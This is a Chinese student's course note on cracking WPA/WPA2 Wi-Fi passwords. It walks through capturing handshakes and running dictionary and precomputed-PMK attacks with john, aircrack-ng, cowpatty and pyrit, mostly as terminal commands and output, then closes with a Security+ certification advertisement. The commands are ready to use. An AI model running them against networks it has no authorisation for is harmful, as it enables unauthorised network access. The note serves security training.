HTTP://ETUORLASLS.ORG/NETWORKING/802.11+SECURITY.+WI-FI+PROTECTED+ACCESS+AND+802.11I/

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃JTR破解密码                                                                     ┃

┃测试效果                                                                        ┃

┃    john --wordlist=password.lst --rules --stdout | grep -i Password123         ┃

┃破解调用                                                                        ┃

┃    john --wordlist=pass.list --rules --stdout | aircrack-ng -e kifi -w wpa.cap ┃

┃北京联通手机号密码破解                                                          ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

╋━━━━━━━━━━━━━━━━━━━━━━━━╋

┃COWPATTY破解密码                                ┃

┃WPA密码通用破解工具                             ┃

┃使用密码字典                                    ┃

┃    cowpatty -r wpa.cap -f password.lst -s kifi ┃

┃使用彩虹表(PMK)                                 ┃

┃    genpmk -f password.lst -d pmkhash -s kifi   ┃

┃    cowpatty -r wpa.cap -d pmkhash -s kifi      ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━╋

root@kali:~# ls

1                      dic                            wpa-01.kisment.csv     wpa-02.kisment.netxml  wpa-04.cap           下载  模板

2444.sh                Play0nLinux's virtual drives   wpa-01.kisment.netxml  wpa-03.cap             wpa-04.csv           公共  视频

5814.pl                rock                           wpa-02.cap             wpa-03.csv             wpa-04.kismet.csv    图片  音乐

??????                 wpa-01.cap                     wpa-02.csv             wpa-03.kismet.csv      wpa-04.kisment.netm  文档

backbox-4.4-amd64.iso  wpa-01.csv                     wpa-02.kisment.csv     wpa-03.kismet.netxml   www.csdn.net.sql

root@kali:~# rm wpa-0*

1         5814.pl   backbox-4.4-amd64.iso  PlayOnLinux's virtual dirves  www.csdn.net.sql  公共  文档  模板  音乐

2444.sh   ????      dict                   rock                          下载              图片  桌面  视频

root@kali:~# iwconfig

eth0      no wireless extensions.

at0       no wireless extensions.

wlan0mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.462 GHz Tx-Power=20 dBm

Retry short limit:7   RTS thr:off    Fragment thr:off

Power Management:off

lo        no wireless extensions.

root@kali:~# airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon --bssid EC:26:CA:DC:29:B6 -c 11 -w wpa

root@kali:~# aircrack-ng -w /usr/share/john/password.lst wpa-01

wpa-01.cap            wpa-01.csv            wpa-01.kismet.csv      wpa-01.kisment.netxml

root@kali:~# aircrack-ng -w /usr/share/john/password.lst wpa-01

wpa-01.cap            wpa-01.csv            wpa-01.kismet.csv      wpa-01.kisment.netxml

root@kali:~# aircrack-ng -w /usr/share/john/password.lst wpa-01.cap

Opening wpa-01.cap

Read 18283 packets.

#  BSSID                ESSID                   Encryption

1  EC:26:CA:DC:29:B6    kifi                    WPA (1 handshake)

Choosing first network as target.

Opening wpa-01.cap

Aircrack-ng 1.2 rc2

[00:00:00] 265 keys tested (300.75 k/s)

KEY FOUND! [ Password ]

Master Key      : 35 D2 A8 EA 41 96 A8 60 OE AF 59 8F 5C D9 66 F1

CA 6E B3 8A A0 C0 B5 F7 1B 32 0A 00 E2 38 D2 DC

Transient Key   : 77 84 F7 EF 0B AC 16 BD 8A E1 42 C1 F3 44 53 34

AD 08 45 0E E6 EF 17 43 B9 2E 65 DF 62 31 6B 45

CE 5D 92 9B C1 F5 54 E6 E5 1C 93 3F 06 E0 90 90

51 F2 5C 73 EA 6D 6C 0F A6 D2 6D BF 50 08 0E 86

EAPOL HMAC      : 4A 39 BA EE A8 83 0D 19 93 E6 8F 7A 60 18 6D 54

root@kali:~# cowpatty -r wpa-01.cap -f /usr/share/john/password.lst -s kifi

cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Colleted all necessary data to mount crack against WPA2/PSK passphrase

Starting dictionary attack. Please be patient

The PSK is "Password".

179 passphrases tested in 1.64 seconds: 109.36 passphrases/second

root@kali:~# genpmk -f /usr/share/john/password.lst -d pmkhash -s kifi

genpmk 1.1 - WPA-PSK precomputation attack.<jwright@hasborg.com>

File pmkhash does not exist,creating.

root@kali:~# ls

1         5814.pl   backbox-4.4-amd64.iso  PlayOnLinux's virtual dirves  rock        wpa-01.csv         wpa-01.kismet.netxml  下载  图片  桌面  视频

2444.sh   ????      dict                   pmkhash                       wpa-01.cap  wpa-01.kismet.csv  www.csdn.net.sql      公共  文档  模板  音乐

root@kali:~# cat pmkhash

root@kali:~# ls

1                      PlayOnLinux's virtual dirves  wpa-01.kismet.netxml  桌面

2444.sh                pmkhash                       www.csdn.net.sql      模板

5814.pl                rock                          下载                  视频

?????                  wpa-01.cap                    公共                  音乐

bockbox-4.4-amd64.iso  wpa-01.csv                    图片

dict                   wpa-01.kismet.csv             文档

root@kali:~# cowpatty -r wpa-01.cap -d pmkhash -s kifi

cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Colleted all necessary data to mount crack against WPA2/PSK passphrase

Starting dictionary attack. Please be patient

The PSK is "Password".

179 passphrases tested in 1.64 seconds: 97494.55 passphrases/second

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃PYRIT破解密码                                           ┃

┃与airolib、cowpatty相同,支持基于预计算的PMK提高破解速度┃

┃独有的优势                                              ┃

┃    除CPU之外pyrit可以运行GPU的强大运算能力加速生成PMK  ┃

┃    本身支持抓包获取四步握手过程,无需用Airdum抓包      ┃

┃    也支持传统的读取airodump抓包获取四步握手的方式      ┃

┃只抓取WAP四次握手过程包                                 ┃

┃    pyrit -r wlan2mon -o wpapyrit.cap stripLive         ┃

┃    pyrit -r wpapyrit.cap analyze                       ┃

┃从airodump抓包导入并筛选                                ┃

┃    pyrit -r wpa.cap -o wpapyrit.cap strip              ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@kali:~# pyrit -r wlan0mon -o wpapyrit.cap stripLive

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Parsing packets from 'wlan0mon'...

1/1: New AccessPonit bc:d1:77:c0:87:de ('MERCURY_C087DE')

2/2: New AccessPonit 14:75:90:21:4f:56 ('TP-LINK_4F56')

3/3: New AccessPonit e0:06:e6:39:c3:0c('lizhi2012')

3/4: New Station 68:3e:34:30:0f:aa (AP ec:26:ca:dc:29:b6)

4/9:  New AccessPonit ec:26:ca:dc:29:b5 ('kifi')

4/21: New Station 80:71:7a:e3:51:c9 (AP 14:74:90:21:4f:56)

4/135: New Station 58:44:98:a3:7a:18 (AP 14:74:90:21:4f:56)

4/324: New Station e8:3e:b6:1b:19:31 (AP 14:74:90:21:4f:56)

4/461: New Station 18:dc:56:f0:26:9f (AP 14:74:90:21:4f:56)

4/646: New Station 90:3c:92:ba:00:cc (AP 14:74:90:21:4f:56)

4/975: New Station e0:06:e6:39:c3:0b (AP 14:74:90:21:4f:56)

4/1957: New Station 54:9f:13:73:02:8d (AP 14:74:90:21:4f:56)

4/2767: New Station 68:3e:34:30:0f:aa (AP 14:74:90:21:4f:56)

4/3286: New Station 6c:71:d9:1c:80:4c (AP 14:74:90:21:4f:56)

5/3858: Challenge AP ec:26:ca:dc:29:b6 <-> STA 68:3e:34:30:0f:aa

6/3859: Response AP ec:26:ca:dc:29:b6 <-> STA 68:3e:34:30:0f:aa

6/3859: New Handshake AP ec:26:ca:dc:29:b6: HMAC_SHA1 AES, bad, spread 1

7/3860: Confirmation AP ec:26:ca:dc:29:b6 <-> STA 68:3e:34:30:0f:aa

7/3960  New Handshake AP ec:26:ca:dc:29:b6: HMAC_SHA1_AES, good, spread 1

8/4065: New AccessPoint bc:14:ef:al:97:29 ('gehua01141406060486797')

^C

Interrupted...

#1: AccessPoint d0:c7:c0:99:ec:3a ('None')

#2: AccessPoint bc:d1:77:c0:87:de (''MERCURY_C087DE')

#3: AccessPoint 14:75:90:21:4f:56 ('TP-LINK_4F56')

#4: AccessPoint bc:14:ef:al:97:29 ('gehua01141406060486797')

#5: AccessPoint ec:26:ca:dc:29:b6 ('kifi')

#0: Station 68:3e:34:30:0f:aa, 1 handshake(s)

#1: HMAC_SHA1_AES, good, spread 1

#6: AccessPoint e0:06:e6:39:c3:0c('lizhi2012')

New pcap-file 'wpapyrit.cap' written (8 out of 6480 packets)

root@kali:~# pyrit -r wpapyrit.cap analyze

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Parsing file 'wpapyrit.cap' (1/1)...

Parsed 8 packets (8 8032.11-packets),got 5 AP(s)

#1: AccessPoint bc:d1:77:c0:87:de (''MERCURY_C087DE')

#2: AccessPoint 14:75:90:21:4f:56 ('TP-LINK_4F56')

#3: AccessPoint bc:14:ef:al:97:29 ('gehua01141406060486797')

#4: AccessPoint ec:26:ca:dc:29:b5 ('kifi')

#1: Station 68:3e:34:30:0f:aa, 1 handshake(s)

#1: HMAC_SHA1_AES, good, spread 1

#5: AccessPoint e0:06:e6:39:c3:0c('lizhi2012')

root@kali:~# pyrit -r wpa.cap -o wpapyrit.cap strip

wpa-01.cap            wpa-01.kismet.csv          wpapyirt.cap

wpa-01.csv            wpa-02.kismet.netxml

root@kali:~# pyrit -r wpa-01.cap -o wpapyrit1.cap strip

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Parsing file 'wpapyrit.cap' (1/1)...

Parsed 17 packets (17 8032.11-packets),got 1 AP(s)

#1: AccessPoint ec:26:ca:dc:29:b5 ('kifi')

#0: Station 68:3e:34:30:0f:aa, 15 handshake(s)

#1: HMAC_SHA1_AES, good, spread 1

#2: HMAC_SHA1_AES, good, spread 3

#3: HMAC_SHA1_AES, good, spread 11

#4: HMAC_SHA1_AES, good, spread 1

#5: HMAC_SHA1_AES, good, spread 1

#6: HMAC_SHA1_AES, good, spread 1

#7: HMAC_SHA1_AES, good, spread 1

#8: HMAC_SHA1_AES, good, spread 1

#9: HMAC_SHA1_AES, good, spread 1

#10: HMAC_SHA1_AES, good, spread 5

#11: HMAC_SHA1_AES, good, spread 7

#12: HMAC_SHA1_AES, good, spread 7

#13: HMAC_SHA1_AES, good, spread 9

#14: HMAC_SHA1_AES, good, spread 9

#15: HMAC_SHA1_AES, good, spread 13

New pcap-file 'wapapritl.cap' written (16 out of 17 packets)

root@kali:~# pyrit -r wpapyrit1.cap strip

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Parsing file 'wpapyrit.cap' (1/1)...

Parsed 17 packets (17 8032.11-packets),got 1 AP(s)

#1: AccessPoint ec:26:ca:dc:29:b5 ('kifi')

#0: Station 68:3e:34:30:0f:aa, 15 handshake(s)

#1: HMAC_SHA1_AES, good, spread 1

#2: HMAC_SHA1_AES, good, spread 3

#3: HMAC_SHA1_AES, good, spread 11

#4: HMAC_SHA1_AES, good, spread 1

#5: HMAC_SHA1_AES, good, spread 1

#6: HMAC_SHA1_AES, good, spread 1

#7: HMAC_SHA1_AES, good, spread 1

#8: HMAC_SHA1_AES, good, spread 1

#9: HMAC_SHA1_AES, good, spread 1

#10: HMAC_SHA1_AES, good, spread 5

#11: HMAC_SHA1_AES, good, spread 7

#12: HMAC_SHA1_AES, good, spread 7

#13: HMAC_SHA1_AES, good, spread 9

#14: HMAC_SHA1_AES, good, spread 9

#15: HMAC_SHA1_AES, good, spread 13

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃PYRIT破解密码                                                                 ┃

┃使用密码字典直接破解                                                          ┃

┃    pyrit -r wpaprit.cap -i password.lst -b <AP MAC> attack passthrough       ┃

┃数据库模式破解                                                                ┃

┃    默认使用基于文件的数据库,支持连接SQL数据库,将计算的PMK存入数据库        ┃

┃    查看默认数据库状态:pyrit eval                                            ┃

┃    导入密码字典:pyrit -i password.lst import password (剔除了不合规的密码) ┃

┃    制定ESSID:pyrit -e kifi create essid                                     ┃

┃    计算PMK:pyrit batch  (发挥GPU计算能力)                                  ┃

┃    破解密码:pyrit -r wpapyrit.cap -b <AP MAC> attack_db                     ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@kali:~# pyrit -r wpaprit.cap -i /usr/share/john/password.lst -b ec:26:ca:dc:29:b6 attack passthrough

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Parsing file 'wpapyrit.cap' (1/1)...

Parsed 8 packets (8 8032.11-packets),got 5 AP(s)

Tried 647 PMKs so far; 238 PMKs per second.

The password is 'Password'.

root@kali:~# pyrit eval

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Connection to storage at 'file://'... connected

Passwords availbale: 0

root@kali:~# pyrit -i usr/share/john/password.lst import password

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Connection to storage at 'file://'... connected

3559 lines read flushing buffers.

root@kali:~# pyrit eval

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Connection to storage at 'file://'... connected

Passwords availbale: 637

root@kali:~# pyrit -e kifi create essid

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Connection to storage at 'file://'... connected

Creates ESSID 'kifi'

root@kali:~# pyrit batch

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Connection to storage at 'file://'... connected

Creates ESSID 'kifi'

Processed all workunits for ESSID 'kifi';179 PMKs per second.nd.

Batchprocessing done.

root@kali:~# pyrit -r wpapyrit.cap -b ec:26:ca:dc:29:b6 attack_db

Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Connection to storage at 'file://'... connected

Parsing file 'wpapyrit1.cap' (1/1)...

Parsed 16 packets (16 802.11-packets), got 1 AP(s)

Attacking handshake with Station 68:3e:34:30:0f:aa...

Tried 351 PMKs so far (56.2%); 20714 PMKs per second.

The password is 'Password'

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

安全牛课堂51CTO专属Q群:571143177   只等你来~

课程答疑咨询安全牛课堂张老师:799562733

Security+认证为什么是互联网+时代最火爆的认证?

牛妹先给大家介绍一下Security+

Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?

原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

原因二: IT运维人员工作与翻身的利器。

在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

转载于:https://blog.51cto.com/11672938/2049481

【安全牛学习笔记】COWPATTY 破解密码相关推荐

  1. 【安全牛学习笔记】离线密码破解、离线密码破解-Hashcat

    离线密码破解 优势 - 离线不会触发密码锁定机制 - 不会产生大量登录失败日志引起管理员注意 HASH识别工具 - hash-identifier - Hashid - 可能识别错误或无法识别 通过使 ...

  2. 无线渗透(五)COWPATTY 破解密码

    JTR破解密码 测试效果 john –wordlist=password.lst –rules –stdout | grep -i Password123 破解调用 john –wordlist=pa ...

  3. 【安全牛学习笔记】字典、在线密码破解-hydra

    字典 按个人信息生成其专属的密码字典 CUPP: Common User Password Profiler - git clone https://github.com/Mebus/cupp.git ...

  4. 【安全牛学习笔记】思路、身份认证方法、密码破解方法、字典

    思路 目标系统实施了强安全措施 - 安装了所有补丁 - 无任何已知漏洞 - 无应用层漏洞 - ***面最小化 社会工程学 获取目标系统用户身份 - 非授权用户不守信,认证用户可以访问守信资源 - 已有 ...

  5. 【安全牛学习笔记】密码嗅探

    密码嗅探 二.三层地址 - IP网络到网络 - MAC主机到主机 交换机与HUB - HUB全端口转发 - 交换机根据学习地址转发 - 混杂模式抓包 [课外拓展]局域网密码嗅探器,只需在自己的电脑上运 ...

  6. 【安全牛学习笔记】密钥交换、AIRCRACK-NG基础、AIRODUMP-NG排错

    密钥交换.AIRCRACK-NG基础.AIRODUMP-NG排错 ╋━━━━━━━━━━━━━━━━━━━━━━━━━━╋ ┃密钥交换                                 ...

  7. 【安全牛学习笔记】 WPS

    ╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋ ┃WPS (WIRELESS PROTECTED SETUP)                            ┃ ┃WPS是Wi ...

  8. 【安全牛学习笔记】WPS (WIRELESS PROTECTED SETUP)

    WPS (WIRELESS PROTECTED SETUP) WPS是WiFi联盟2006年开放的一项技术 通过PIN码来简化无线接入的操作,无需记住PSK 路由器和网卡各按一个按钮就能接入无线 PI ...

  9. 【安全牛学习笔记】其他途径

    其他途径 其他途径 社交网络 工商注册 新闻组/论坛 招聘网站 http://www.archive.org/web/web.php 个人专属的密码字典 按个人信息生成其专属的密码字典 CUPP--- ...

最新文章

  1. php微信jssdk下载图片,微信JSSDK上传多张图片回调方法以及服务器端处理下载媒体...
  2. U盘从4G变为了75M 恢复U盘容量的方法
  3. C# 程序运行耗时测试类
  4. php curl 下载图片,CURL实现下载远程图片并保存到本地
  5. Web和HTTP基本术语和概念
  6. pytorch统计矩阵非0的个数_矩阵的三种存储方式---三元组法 行逻辑链接法 十字链表法...
  7. matlab求傅里叶级数展开式_傅里叶级数:从向量的角度看函数
  8. 11-Mybatis 延迟加载策略
  9. Manjaro_xfce 安装后配置
  10. 【渝粤教育】国家开放大学2018年秋季 1121t健康教育与健康促进 参考试题
  11. Gitlab错误: You must use a personal access token with 'api' scope for Git over HTTP.
  12. Unix/Linux操作系统介绍
  13. matlab 搜索 nan,MATLAB NaN详解
  14. 过滤器 和 拦截器的 6个区别,别再傻傻分不清了
  15. 大话无线通讯基础之:WIFI和5G信道划分
  16. SQL刷题:排名的问题
  17. VS code入门笔记(一)常用标签介绍
  18. Tegra Nano上手
  19. 棣拓DTAS公差分析软件-蒙特卡洛法公差分析软件-容差分析软件
  20. 国家开放大学-农村社会学-形考作业1

热门文章

  1. VGG——深度学习必会模型及PyTorch实现
  2. hdfs文件系统和linux文件系统,分布式文件系统HADOOP HDFS与传统文件系统LINUX FS的比较与分析...
  3. 【record】1、FS-I6设置与对码
  4. “AI鉴黄师”数据采集标注方案上线
  5. Windows安装TVM详细教程及报错提示
  6. Kitty用HTML和css咋做,使用 CSS3 绘制 Hello Kitty
  7. 计算机一级云居寺,刁常宇-Zhejiang University Personal homepage
  8. 禅卡塔罗:一个真正厉害的塔罗师是什么样的?
  9. python数据可视化案例 淘宝粽子_Python分析淘宝月饼销售数据,哪种最受欢迎?排第一的你想不到...
  10. jquery 堆栈溢出_带有jQuery和CSS3的漂亮照片堆栈库